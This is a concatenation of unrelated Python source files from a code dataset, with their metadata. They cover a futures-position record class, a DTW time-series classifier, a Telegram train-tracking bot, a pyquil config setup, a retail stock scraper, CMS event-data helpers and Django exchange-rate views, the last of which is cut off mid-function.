\"\"\"获取指定交易时间最低价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_LOW)\n\n def get_lowest_by_ticks(self, date, count, field):\n \"\"\"获得交易时间前指定个tick中的最小值\n :param date: 交易时间\n :param count: tick数\n :param field: 字段\n :return: 数据不存在则返回np.nan\n \"\"\"\n dat = self.data[self.data.index <= date].tail(count)\n return dat[field].min()\n\n def get_highest_by_ticks(self, date, count, field):\n \"\"\"获得交易时间前指定个tick中的最大值\n :param date: 交易时间\n :param count: tick数\n :param field: 字段\n :return: 数据不存在则返回np.nan\n \"\"\"\n dat = self.data[self.data.index <= date].tail(count)\n return dat[field].max()\n\n\nclass Position:\n \"\"\"持仓单位(仓位)\"\"\"\n\n # 仓位状态\n POS_STAT_OPEN = 1 # 开仓中\n POS_STAT_CLOSE = 2 # 平仓中\n POS_STAT_FINISH = 0 # 开平仓已完成\n POS_STAT_INVALID = -1 # 无效\n\n def __init__(self, pos=None, price=None, time=None, volume=None, direction=None, status=-1):\n \"\"\"加仓信息\n :param pos: 目标持仓数\n :param price: 成交价\n :param time: 时间\n :param volume: 开仓手数\n :param direction: 方向\n :param status: 状态\n \"\"\"\n self.target_pos = pos\n self.price = price\n self.time = time\n self.volume = volume\n self.direction = direction\n self.status = status\n\n def __str__(self):\n values = {'target_pos': self.target_pos, 'price': self.price, 'time': self.time,\n 'volume': self.volume, 'direction': self.direction, 'status': self.status}\n return str(values)\n\n def assign(self, values):\n \"\"\"赋值\n :param dict values: 赋值数据\n :return True|False\n \"\"\"\n try:\n passed_fields = values.keys()\n except Exception:\n return False\n\n if 'target_pos' in passed_fields:\n self.target_pos = values['target_pos']\n if 'price' in passed_fields:\n self.price = values['price']\n if 'time' in passed_fields:\n self.time = values['time']\n if 'volume' in passed_fields:\n self.volume = values['volume']\n if 'direction' in passed_fields:\n self.direction = values['direction']\n if 'status' in passed_fields:\n self.status = values['status']\n return True\n\n\nclass TradeDetailsRecord(GenConfig):\n def __init__(self, cfgFile, logger):\n \"\"\"交易策略配置信息接口\n :raise TradeDetailsRecordError: 初始化仓位数据错误,将会抛出异常,调用时需捕获该异常\n \"\"\"\n super(TradeDetailsRecord, self).__init__(cfgFile)\n self.cfgFile = cfgFile\n self.defaultSec = \"all\"\n self.logger = logger\n # 初始化仓位信息\n self.__positions = []\n if not 
self.load_pos_details():\n raise TradeDetailsRecordError(f\"加载pos_details出错!\")\n # 交易方向\n self.__direction = self.get_property('current_direction', 0)\n if self.__direction is None:\n raise TradeDetailsRecordError(f\"加载current_direction出错!\")\n\n def __valid_pos_index(self, num):\n \"\"\"返回是否为有效的仓位索引\n :param num: 仓位索引\n :return: True|False\n \"\"\"\n if num < 1 or num > len(self.__positions):\n return False\n return True\n\n def load_pos_details(self):\n \"\"\"加载仓位信息\n :return: True|False\n \"\"\"\n ret = True\n self.__positions.clear()\n pos_details = self.getSecOption(self.defaultSec, 'pos_details')\n if not pos_details:\n # 仓位为空\n return ret\n\n try:\n pos_details = eval(pos_details)\n for val in pos_details:\n pos = Position()\n if not pos.assign(val):\n self.logger.error(f\"无法解析仓位信息 val: {val}\")\n ret = False\n break\n self.__positions.append(pos)\n except Exception as e:\n self.logger.error(f\"转换时出现错误:pos_details: {pos_details}; \"\n f\"exp: {traceback.format_exc(e)}\")\n ret = False\n return ret\n\n def save_pos_details(self):\n \"\"\"保存仓位信息\"\"\"\n pos_details = [str(pos) for pos in self.__positions]\n self.setSecOption(self.defaultSec, 'pos_details', str(pos_details))\n\n def get_cur_pos_num(self):\n \"\"\"返回当前仓位\"\"\"\n return len(self.__positions)\n\n def get_position(self, num=None):\n \"\"\"返回第num个仓位,num从1开始记\n :param num: 仓位索引,默认最后一个仓位\n :return: 索引对应仓位\n \"\"\"\n # 默认(num为None)返回最后一个仓位\n if num is None:\n num = self.get_cur_pos_num()\n\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return None\n\n return self.__positions[num-1]\n\n def set_position(self, num, values):\n \"\"\"\n 更新仓位数据\n :param num: 仓位索引\n :param dict values: 赋值数据\n :return: True|False\n \"\"\"\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return False\n\n pos = self.__positions[num-1]\n if not pos.assign(values):\n return False\n self.save_pos_details()\n return True\n\n def add_position(self, pos):\n \"\"\"添加新仓位\n :param pos: Position class实例\n \"\"\"\n self.__positions.append(pos)\n self.save_pos_details()\n\n def del_position(self, num):\n \"\"\"删除仓位,num从1开始记\n :param num: 仓位索引,默认最后一个仓位\n :return: 正常返回已删除的仓位信息,否则返回None\n \"\"\"\n ret = None\n # 默认(num为None)返回最后一个仓位\n if num is None:\n num = self.get_cur_pos_num()\n\n if not self.__valid_pos_index(num):\n self.logger.error(f\"仓位超出范围:num {num}, current {len(self.__positions)}\")\n return ret\n\n ret = self.__positions.pop(num-1)\n self.save_pos_details()\n return ret\n\n def clear_position(self):\n \"\"\"清除所有仓位\"\"\"\n self.__positions.clear()\n self.save_pos_details()\n\n def get_direction(self):\n \"\"\"得到交易方向\n :return: 0 -> 无交易;1 -> 买多;-1 -> 卖空\n \"\"\"\n return self.__direction\n\n def save_direction(self, direction):\n self.__direction = direction\n self.setSecOption(self.defaultSec, 'current_direction', str(direction))\n\n def get_property(self, prop_name, def_ret):\n \"\"\"从TDR文件读取属性值\n :param prop_name: 属性名称\n :param def_ret: 默认返回值\n :return: 正常返回属性值,错误返回None\n \"\"\"\n value = self.getSecOption(self.defaultSec, prop_name)\n if value is None:\n return def_ret\n\n try:\n ret = eval(value)\n except Exception as e:\n self.logger.error(f\"转换时出现错误:{prop_name}: {value}; exp: {traceback.format_exc(e)}\")\n ret = None\n return ret\n\n def save_property(self, prop_name, value):\n \"\"\"保存属性值到TDR\n :param prop_name: 属性名称\n :param value: 属性值\n :return:\n \"\"\"\n self.setSecOption(self.defaultSec, prop_name, 
str(value))\n","sub_path":"ctp/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467184718","text":"from dtaidistance import dtw\nimport numpy as np\nimport pickle\nfrom dataAnalysis.analysisData import AnalysisData\nan= AnalysisData()\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import DataFrame\n\ndef check_similarity(seriesDTW, seriesType):\n distances=[]\n for i in seriesType:\n distances.append(distanceOfSeries(seriesDTW, i))\n return distances\n\ndef distanceOfSeries(s1, s2):\n return dtw.distance(s1, s2)\n\ndef getSeries(type):\n indi_data = an.evaluateIndividual('../FinalEvaluation/data/individual3/' + str(1) + '/augmented_train/train.json')\n\n series = []\n typeval = [data['pupilListSmoothed'][:291] for data in indi_data if type == data['type']]\n peaks_valleys = an.detectPeakandValley(np.array(\n [tuple(data['pupilListSmoothed'][:291]) for data in indi_data if type == data['type']]), range(291))\n for i in range(len(typeval)):\n y_val = typeval[i]\n y_val = np.array(y_val)\n lowestValley = np.where(y_val == min(y_val))[0][0]\n highestPeak = np.where(y_val == max(y_val[lowestValley:]))[0][0]\n peaks_valleys = np.concatenate(([highestPeak - lowestValley], [0]))\n x_value = np.array(range(lowestValley, highestPeak + 1))\n y_val = y_val[lowestValley: highestPeak + 1]\n series.append(y_val)\n return series\n\ndef getDTWseries(file):\n with open(file, 'rb') as f:\n s2=pickle.load( f)\n return s2\n\ndef get_testData(type):\n indi_data = an.evaluateIndividual('../FinalEvaluation/data/individual3/' + str(1) + '/augmented_train/test.json')\n\n series = []\n typeval = [data['pupilListSmoothed'][:291] for data in indi_data if type == data['type']]\n peaks_valleys = an.detectPeakandValley(np.array(\n [tuple(data['pupilListSmoothed'][:291]) for data in indi_data if type == data['type']]), range(291))\n for i in range(len(typeval)):\n y_val = typeval[i]\n y_val = np.array(y_val)\n lowestValley = np.where(y_val == min(y_val))[0][0]\n highestPeak = np.where(y_val == max(y_val[lowestValley:]))[0][0]\n peaks_valleys = np.concatenate(([highestPeak - lowestValley], [0]))\n x_value = np.array(range(lowestValley, highestPeak + 1))\n y_val = y_val[lowestValley: highestPeak + 1]\n series.append(y_val)\n return series\ndef smoothSeries(s):\n\n series = DataFrame (s,columns=['Column_Name'])\n # Tail-rolling average transform\n rolling = series.rolling(window=3)\n rolling_mean = rolling.mean()\n return rolling_mean\ndef classify():\n seriesType= getSeries(0)\n seriesDTW= getDTWseries('DTW_obj/DTW_Train0_.obj')\n d_bw_0_DTW= check_similarity(seriesDTW, seriesType)\n #print(d_bw_0_DTW)\n\n seriesType = getSeries(1)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train1_.obj')\n d_bw_1_DTW = check_similarity(seriesDTW, seriesType)\n #print(d_bw_1_DTW)\n\n seriesType = getSeries(2)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train2_.obj')\n d_bw_2_DTW = check_similarity(seriesDTW, seriesType)\n #print(d_bw_2_DTW)\n\n seriesType = getSeries(2)\n seriesDTW = getDTWseries('DTW_obj/DTW_Train1_.obj')\n diff_bw_12_DTW = check_similarity(seriesDTW, seriesType)\n #print(diff_bw_12_DTW)\n\n ser0=getDTWseries('DTW_obj/DTWFull_Train0_.obj')\n ser1 = getDTWseries('DTW_obj/DTWFull_Train2_.obj')\n ser2 = getDTWseries('DTW_obj/DTWFull_Train2_.obj')\n\n sim_bw_12 = distanceOfSeries(ser1, ser2)\n sim_bw_10 = distanceOfSeries(ser1, ser0)\n print(sim_bw_12)\n print(sim_bw_10)\n\n 
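# A hypothetical nearest-reference decision using the pieces above; it is\n    # left commented out like the plotting code below, and 'refs' and\n    # 'test_series' are illustrative names, not part of the original script:\n    # refs = {0: ser0, 1: ser1, 2: ser2}\n    # test_series = get_testData(0)[0]\n    # predicted = min(refs, key=lambda t: distanceOfSeries(test_series, refs[t]))\n    # print('predicted type:', predicted)\n    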
#plt.plot(sim_bw_12, color='red', label='Negative Vs Neutral')\n #plt.plot(ser1, color='blue', label='Neutral')\n #plt.plot(sim_bw_10, color='green', label='Positive Vs Neutral')\n #plt.figure()\n #plt.plot(smoothSeries(d_bw_2_DTW), color='red', label='Negative')\n #plt.plot(smoothSeries(d_bw_1_DTW), color='blue', label='Neutral')\n #plt.plot(smoothSeries(d_bw_0_DTW), color='green', label='Positive')\n #plt.legend()\n plt.figure(figsize=(10, 6))\n plt.plot(d_bw_2_DTW, color='red', label='Negative')\n plt.plot(d_bw_1_DTW, color='blue', label='Neutral')\n plt.plot(d_bw_0_DTW, color='green', label='Positive')\n plt.legend(loc='best')\n plt.show()\n\nclassify()","sub_path":"dataAnalysis/ClassifyDTWdist.py","file_name":"ClassifyDTWdist.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12570807","text":"\n\n#calss header\nclass _CHEMISTRY():\n\tdef __init__(self,): \n\t\tself.name = \"CHEMISTRY\"\n\t\tself.definitions = [u'the scientific study of the basic characteristics of substances and the ways in which they react or combine: ', u'the basic characteristics of a substance and the ways in which it reacts or combines with other substances: ', u'a quality that exists when two people understand and are attracted to each other: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_chemistry.py","file_name":"_chemistry.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443353822","text":"import API\nimport Bot\nfrom CONFIG import TOKEN\nfrom Callback import *\nfrom Inlinemode import *\n\nimport time\n\nimport sqlite3\nconn = sqlite3.connect('OrarioTreni.db')\nc = conn.cursor()\nAPI.db.creaTutto()\n\nimport botogram\nbot = botogram.create(TOKEN)\n\nimport logging\nlogger = logging.getLogger(\"tracciamento\")\n\nformat = \"%(asctime)s [%(levelname)s]: %(message)s\"\nlevel = logging.DEBUG\nlogging.basicConfig(format=format, level=level)\n\ndef tracciamento():\n c.execute('''SELECT * FROM tracciamento''')\n rows = c.fetchall()\n if not rows:\n logging.debug(\"Nessun treno da tracciare\")\n return\n\n for res in rows:\n request_id = str(res[0])\n user_id = res[1]\n id_treno = res[2]\n solo_oggi = res[3]\n stazione_ultimo_rilevamento = res[4]\n random_string = res[5]\n\n data, success, error = API.orarioTreni.cercaTreno(str(id_treno))\n\n if data == None:\n continue\n\n stazione_attuale = data['stazioneUltimoRilevamento']\n if stazione_attuale == \"--\":\n stazione_attuale = data['origine']\n\n logging.info(\"Processando la richiesta numero {} del treno {} da {}\".format(request_id, id_treno, user_id))\n\n if stazione_ultimo_rilevamento == data['destinazione'] and stazione_ultimo_rilevamento == data['stazioneUltimoRilevamento']:\n continue\n\n if stazione_ultimo_rilevamento == data['destinazione'] and stazione_attuale == data['origine']:\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? 
WHERE request_id=?''', (stazione_attuale, request_id,))\n conn.commit()\n continue\n\n if stazione_attuale != stazione_ultimo_rilevamento:\n logging.info(\"Richiesta numero {}, il treno ha cambiato stazione da {} a {}\".format(id_treno, stazione_ultimo_rilevamento, stazione_attuale))\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? WHERE request_id=?''', (stazione_attuale, request_id,))\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\n🚅Il treno {treno} ha cambiato stazione!\"\n \"\\n🚉{precedente} ➡️ 🚉{successiva}\"\n \"\\n🕒Ritardo: {ritardo}m\".format(treno=id_treno, precedente=stazione_ultimo_rilevamento, successiva=stazione_attuale, ritardo=data['ritardo'])\n )\n\n if stazione_attuale in str(data['fermate']):\n numero_fermata = -1\n for dict in data['fermate']:\n numero_fermata = numero_fermata + 1\n if stazione_attuale == dict['stazione']:\n break\n\n try:\n fermata = API.Messaggi.fermata(data, numero_fermata)\n text = text + \"\\n\\n\" + fermata\n except Exception as e:\n logger.error(\"Errore nella formattazione della fermata: {}\".format(e))\n text = text + \"\\n\\n\" + \"Errore sconosciuto. Contattare lo sviluppatore. {}\".format(e)\n\n text = text + \"\\n➡️Clicca qui per seguire tutto il tracciamento: #tracciamento{N}\".format(N=random_string)\n\n else:\n text = text + \"\\n\\n\" + \"Il treno non ferma in questa fermata\"\n text = text + \"\\n\\n➡️Clicca qui per seguire tutto il tracciamento: #tracciamento{N}\".format(N=random_string)\n\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\", \"reply_markup\":\n '{\"inline_keyboard\": [[{\"text\": \"❌ Disattiva le notifiche\", \"callback_data\": \"stop_tracciamentoT'+request_id+'\"}]]}'\n })\n\n if stazione_attuale == data['destinazione']:\n if solo_oggi == True:\n c.execute('DELETE FROM tracciamento WHERE request_id=?', (request_id,))\n logging.info(\"Utente {} tracciamento cancellato {}\".format(user_id, request_id))\n conn.commit()\n\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\nIl treno {treno} è arrivato a destinazione con un ritardo di {ritardo} minuti!\"\n \"\\nHo interrotto il tracciamento\".format(treno=id_treno, ritardo=data['ritardo'])\n )\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\"\n })\n\n if solo_oggi == False:\n c.execute('''UPDATE tracciamento SET stazione_ultimo_rilevamento=? 
WHERE request_id=?''', (data['destinazione'], request_id,))\n text = (\n \"🚦Traccia treno [BETA]\"\n \"\\nIl treno {treno} è arrivato a destinazione con un ritardo di {ritardo} minuti\"\n \"\\nDomani riceverai ancora notifiche sul treno\".format(treno=id_treno, ritardo=data['ritardo'])\n )\n bot.api.call(\"sendMessage\", {\n \"chat_id\": user_id, \"text\": text, \"parse_mode\": \"HTML\", \"reply_markup\":\n '{\"inline_keyboard\": [[{\"text\": \"❌ Disattiva le notifiche\", \"callback_data\": \"stop_tracciamentoT'+request_id+'\"}]]}'\n })\n\n\n conn.commit()\n\nwhile True:\n try:\n tracciamento()\n except Exception as e:\n logging.exception(e)\n time.sleep(5)\n","sub_path":"Tracciamento.py","file_name":"Tracciamento.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233512649","text":"##############################################################################\n# Copyright 2016-2017 Rigetti Computing\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nimport re\nimport os\n\nfrom six.moves import input\n\nfrom pyquil.api._config import PyquilConfig\n\n\ndef main():\n print(\"Welcome to PyQuil!\")\n print(\"Enter the required information below for Forest connections.\")\n print(\"If you haven't signed up yet you will need to do so first at http://forest.rigetti.com\")\n\n while True:\n key = input(\"Forest API Key: \")\n key_ma = re.match(r'^\\s*(\\w{40})\\s*$', key)\n if key_ma:\n # Looks like a real key\n key = key_ma.group(1)\n break\n\n print(\"That doesn't look like a valid API key. Try again or use Ctrl-C to quit\")\n\n while True:\n user = input(\"User ID: \")\n user_ma = re.match(r'^\\s*([a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-'\n r'[a-fA-F0-9]{4}-[a-fA-F0-9]{12})\\s*$', user)\n if user_ma:\n # Looks like a real user id\n user = user_ma.group(1)\n break\n\n print(\"That doesn't look like a valid User ID. Try again or use Ctrl-C to quit\")\n\n path = PyquilConfig.DEFAULT_PYQUIL_CONFIG_PATH\n\n if os.path.exists(path):\n # Make a backup by appending .bak(i) where we increment\n # i until the desired backup filename doesn't already exist\n i = 1\n dn = os.path.dirname(path)\n bn = os.path.basename(path)\n while True:\n bak_path = os.path.join(dn, \"{bn}.bak{i}\".format(bn=bn, i=i))\n if not os.path.exists(bak_path):\n break\n i += 1\n\n print(\"I already found a file at {path}. 
Creating a backup at {bak_path}.\"\n .format(path=path, bak_path=bak_path))\n\n os.rename(path, bak_path)\n\n with open(path, 'w') as f:\n f.write(\"[\" + PyquilConfig.SECTION + \"]\\n\")\n f.write(PyquilConfig.API_KEY + \": \" + key + \"\\n\")\n f.write(PyquilConfig.USER_ID + \": \" + user + \"\\n\")\n\n print(\"Pyquil config file created at '%s'\" % path)\n print(\"If you experience any problems see the guide at https://go.rigetti.com/getting-started\")\n","sub_path":"pyquil/setup/pyquil_config_setup.py","file_name":"pyquil_config_setup.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323490332","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 12:10:05 2019\n\n@author: Artesia\n\"\"\"\nimport os\nimport shutil\n\nimport pytest\n\npathname = os.path.join('examples', 'notebooks')\n# get list of notebooks to run\nfiles = [f for f in os.listdir(pathname) if f.endswith('.ipynb')]\n\ntestdir = 'build'\nif os.path.isdir(os.path.join(pathname, testdir)):\n shutil.rmtree(os.path.join(pathname, testdir))\nos.mkdir(os.path.join(pathname, testdir))\n\n\n@pytest.mark.parametrize(\"file\", files)\ndef test_notebook(file):\n cwd = os.getcwd()\n\n os.chdir(pathname)\n if file not in []:\n try:\n # run autotest on each notebook\n cmd = 'jupyter ' + 'nbconvert ' + \\\n '--ExecutePreprocessor.timeout=600 ' + \\\n '--to ' + 'notebook ' + \\\n '--execute ' + '\"{}\" '.format(file) + \\\n '--output-dir ' + '{} '.format(testdir)\n ival = os.system(cmd)\n msg = 'could not run {}'.format(file)\n assert ival == 0, msg\n assert os.path.isfile(os.path.join(testdir, file)), msg\n except Exception as e:\n os.chdir(cwd)\n raise Exception(e)\n os.chdir(cwd)\n\n\nif __name__ == '__main__':\n for file in files:\n test_notebook(file)\n","sub_path":"tests/test_notebooks.py","file_name":"test_notebooks.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300776100","text":"from scraper.common import ScrapeResult, Scraper, ScraperFactory\n\n\nclass PlayStationScrapeResult(ScrapeResult):\n def parse(self):\n alert_subject = 'In Stock'\n alert_content = ''\n\n product = self.soup.body.find('div', class_='productHero-info')\n if not product:\n tag = self.soup.body.find('div', id='challenge-container')\n if tag:\n self.logger.warning('access denied, got a CAPTCHA')\n else:\n self.logger.warning(f'missing product info div: {self.url}')\n return\n\n # get name of product\n tag = product.find('h2')\n if tag:\n alert_content += tag.text.strip() + '\\n'\n else:\n self.logger.warning(f'missing title: {self.url}')\n\n # get listed price\n tag = product.select_one('div.price-text > span.product-price')\n price_str = self.set_price(tag)\n if price_str:\n alert_subject = f'In Stock for {price_str}'\n\n # check for add to cart button\n tag = product.select_one('div.button-placeholder > button.add-to-cart')\n if tag and 'add to cart' in tag.text.lower():\n self.alert_subject = alert_subject\n self.alert_content = f'{alert_content.strip()}\\n{self.url}'\n\n\n@ScraperFactory.register\nclass PlayStationScraper(Scraper):\n @staticmethod\n def get_domain():\n return 'playstation'\n\n @staticmethod\n def get_driver_type():\n return 'selenium'\n\n @staticmethod\n def get_result_type():\n return 
PlayStationScrapeResult\n","sub_path":"src/scraper/playstation.py","file_name":"playstation.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592271350","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom DataFormats.FWLite import Events, Handle\n\nclass HandleData(Handle):\n def __init__(self,product,label):\n Handle.__init__(self,product)\n self.label = str(label)\n def get(self,event):\n event.getByLabel(self.label,self)\n \nclass EvtHandles:\n def __init__(self,products=[],verbose=False):\n for product in products:\n if verbose:\n print(\"adding handle {name}, {type}, {tag}\".format(**product))\n setattr(self,product['name'],HandleData(product['type'],product['tag']))\n \nclass EvtData:\n def __init__(self,products=[],verbose=False):\n self.handles = EvtHandles(products,verbose)\n self.event = None\n self.got_handles = []\n\n def get_handles(self,event,on_demand=True):\n \"\"\" \n gets the handles for the event\n if on_demand=True it doesnt actually get the handles and instead\n waits for something to request the handle\n \"\"\" \n self.got_handles = []\n self.event = event\n if not on_demand:\n for name,handle in vars(self.handles).iteritems(): \n handle.get(event)\n self.got_handles.append(name)\n\n def get_handle(self,name):\n \"\"\" \n gets the product handle with name \"name\"\n now checks to ensure the handles are got first and not gets them\n \"\"\" \n \n handle = getattr(self.handles,name)\n if not name in self.got_handles:\n handle.get(self.event)\n self.got_handles.append(name)\n\n return handle\n \n def get(self,name):\n \"\"\" \n gets the product with name \"name\"\n now checks to ensure the handles are got first and not gets them\n \"\"\" \n handle = self.get_handle(name)\n \n try:\n return handle.product()\n except RuntimeError:\n return None\n\n \nclass EvtWeights:\n def __init__(self,input_filename,lumi=0.075):\n if input_filename: \n with open(input_filename,'r') as f:\n self.data = json.load(f)\n else:\n self.data = {} \n self.warned = []\n self.lumi = lumi #luminosity to weight to in pb\n\n def weight_from_name(self,dataset_name):\n if dataset_name in self.data:\n val = self.data[dataset_name]\n return val['xsec']/val['nrtot']*self.lumi\n else:\n if dataset_name not in self.warned:\n self.warned.append(dataset_name) \n print(\"{} not in weights file, returning weight 1\".format(dataset_name))\n return 1.\n\n def weight_from_evt(self,event):\n filename = event.getTFile().GetName().split(\"/\")[-1]\n dataset_name = re.search(r'(.+)(_\\d+_EDM.root)',filename).groups()[0]\n return self.weight_from_name(dataset_name)\n\ndef add_product(prods,name,type_,tag):\n prods.append({'name' : name, 'type' : type_, 'tag' : tag})\n\nstd_products=[]\nadd_product(std_products,\"egtrigobjs\",\"std::vector\",\"hltEgammaHLTExtraL1Seeded\")\nadd_product(std_products,\"genparts\",\"std::vector\",\"genParticles\")\n\nphaseII_products = []\nadd_product(phaseII_products,\"egtrigobjs\",\"std::vector\",\"hltEgammaHLTExtra\")\nadd_product(phaseII_products,\"genparts\",\"std::vector\",\"genParticles\")\nadd_product(phaseII_products,\"l1trks\",\"std::vector,Phase2TrackerDigi,edm::refhelper::FindForDetSetVector > > >\",\"hltEgammaHLTPhase2Extra\")\nadd_product(phaseII_products,\"trkpart\",\"std::vector\",\"hltEgammaHLTPhase2Extra\")\nadd_product(phaseII_products,\"hcalhits\",\"edm::SortedCollection 
>\",\"hltEgammaHLTExtra\")\nadd_product(phaseII_products,\"trksv0\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV0\")\nadd_product(phaseII_products,\"trksv2\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV2\")\nadd_product(phaseII_products,\"trksv6\",\"std::vector\",\"hltEgammaHLTExtra:generalTracksV6\")\n","sub_path":"python/EvtData.py","file_name":"EvtData.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"629222639","text":"# -*- coding:utf-8 -*-\n__author__ = 'Xie Zhaoheng'\n__date__ = '2017/8/23 15:43'\nimport json\nimport datetime\nimport decimal\nimport os\n\nclass CJsonEncoder(json.JSONEncoder):\n \"\"\"\n 如果时间类型是 datetime.date 或者 str 类型,指定该方法处理\n \"\"\"\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n #return obj.strftime('%Y-%m-%d %H:%M:%S')\n return obj.strftime('%Y-%m-%d')\n elif isinstance(obj, datetime.date):\n return obj.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, obj)\n\n\nif __name__ == \"__main__\":\n # item时间类型是 datetime.date\n item = {'comment_nums': 0, 'create_date': datetime.date(2017, 8, 3)}\n lines = json.dumps(dict(item), ensure_ascii=False, cls=CJsonEncoder) + \"\\n\"\n print('lines: ', lines)\n\n # item时间类型是 str\n item_2 = {'comment_nums': 3, 'create_date': '2017/8/3'}\n lines_2 = json.dumps(dict(item), ensure_ascii=False, cls=CJsonEncoder) + \"\\n\"\n print('lines_2: ', lines_2)\n","sub_path":"muke_spider/utils/JsonMy.py","file_name":"JsonMy.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651193826","text":"from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom .models import Question, Valuta_kurs, Valuta\nfrom django.shortcuts import get_object_or_404, render, render_to_response\nfrom django.utils import translation\nfrom django.utils.translation import LANGUAGE_SESSION_KEY, ugettext as _\nimport requests\nimport pandas as pd\nimport datetime as DT\nimport matplotlib.pyplot as plt\nimport re\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\n\n# import pickle\n# from pymemcache import Client\n\nnow = DT.datetime.now()\ntoday = DT.date.today()\nweek_ago = today - DT.timedelta(days=7)\n\n\ndef index(request):\n if request.user.is_authenticated and request.user.is_staff:\n username = request.user\n else:\n username = 'Аноним'\n return render_to_response('my_exrate/index.html',\n {'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef user_login(request):\n user = authenticate(username=request.POST.get('username'),\n password=request.POST.get('password'))\n if user is None:\n return render_to_response('my_exrate/login.html', {})\n else:\n login(request, user)\n\n return HttpResponseRedirect('/')\n\n\ndef user_logout(request):\n if request.user.is_authenticated:\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef register(request):\n return render_to_response('my_exrate/register.html')\n\n\ndef user_register(request):\n user = User.objects.create_user(username=request.POST.get('username'), email=request.POST.get('email'),\n password=request.POST.get('password'), is_staff=True)\n login(request, user)\n return HttpResponseRedirect('/')\n\n\ndef user_check(request):\n usr = 'ok'\n eml = 'ok'\n if re.search('^[a-z0-9_-]{3,16}$', 
request.POST.get('username')) == None:\n usr = 'user_not_check'\n if User.objects.filter(username=request.POST.get('username')).exists():\n usr = 'user_exists'\n\n if not re.match(r\"^[A-Za-z0-9\\.\\+_-]+@[A-Za-z0-9\\._-]+\\.[a-zA-Z0-9]*$\", request.POST.get('email')):\n eml = 'email_not_check'\n if User.objects.filter(email=request.POST.get('email')).exists():\n eml = 'email_exists'\n\n response = {'user': usr, 'email': eml}\n\n return JsonResponse(response)\n\n\n# построить график курсов -- amcharts\ndef amcharts(request, Cur_ID):\n chartData = \"\"\n if request.user.is_authenticated:\n # if request.user.is_authenticated and request.user.view('my_exrate.valuta'):\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n # for val_1 in Valuta.objects.all():\n x = []\n y = []\n i = 0\n quot = \"\\\"\"\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n # chartData += prefix\n chartData += \"{\\n\"\n chartData += \"date:\" + quot + str(rate_1.Date.year) + \"-\" + str(\n '{:02d}'.format(rate_1.Date.month)) + \"-\" + str(\n '{:02d}'.format(rate_1.Date.day)) + quot + \",\\n\"\n chartData += \"value:\" + str(rate_1.Cur_OfficialRate) + \"\\n}\"\n i = i + 1\n chartData += \",\"\n # print(chartData)\n else:\n return render_to_response('my_exrate/amcharts.html', {})\n return render(request, 'my_exrate/amcharts.html', {'header': val_1.Cur_Name, 'chartData': chartData})\n\n\n# построить график курсов -- matplotlib\ndef matplotlib(request, Cur_ID):\n if request.user.is_authenticated:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n 